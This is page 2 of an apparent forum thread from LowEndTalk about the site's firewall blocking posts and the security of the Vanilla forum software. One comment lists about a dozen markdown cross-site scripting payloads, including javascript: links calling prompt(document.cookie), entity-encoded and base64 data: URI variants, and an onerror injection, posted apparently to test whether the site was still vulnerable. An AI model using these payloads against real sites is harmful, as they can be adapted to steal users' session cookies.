Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Amusing "Censorship" by LET? xD - Page 2
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

Amusing "Censorship" by LET? xD

2»

Comments

• mpkossen said: I'm not aware of the benefits we may get from this WAF level and how that weighs up against the downside.

It might be a good precaution against 0-day exploits in Vanilla. We all remember the week where LET was hacked like 5 times, this doesn't really instill confidence in the security of Vanilla.

• DillybobDillybob Member
    edited July 2015
    [a](javascript:prompt(document.cookie))
    [a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
    ![a](javascript:prompt(document.cookie))\
    <javascript:prompt(document.cookie)>  
    <&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>  
    ![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
    [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
    [a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
    ![a'"`onerror=prompt(document.cookie)](x)\
    [citelol]: (javascript:prompt(document.cookie))
    [notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
    [test](javascript://%0d%0aprompt(1))
    [test](javascript://%0d%0aprompt(1);com)

test

notmalicious
    a

Yeah, looks like LET has patched the recent telescope vulnerability.

• sepeisepei Member
    edited July 2015

/var/ www

Same here

• emgemg Veteran

Yeah, it happened to me a few weeks ago. I was trying to post some advice on how to use a sniph-pher tool to isolate and fix a problem. The post got blocked for posting hac-king advice.

I was told that LET would unblock me, and I assume it happened, but by then, everyone had moved on, including me. I still have the useful advice somewhere in a text file on my local computer.

• @gsrdgrdghd said:
    It might be a good precaution against 0-day exploits in Vanilla. We all remember the week where LET was hacked like 5 times, this doesn't really instill confidence in the security of Vanilla.

As far as I am aware Vanilla has gotten a lot more stable and secure since then, especially since we are now running an unmodified version straight from their Github.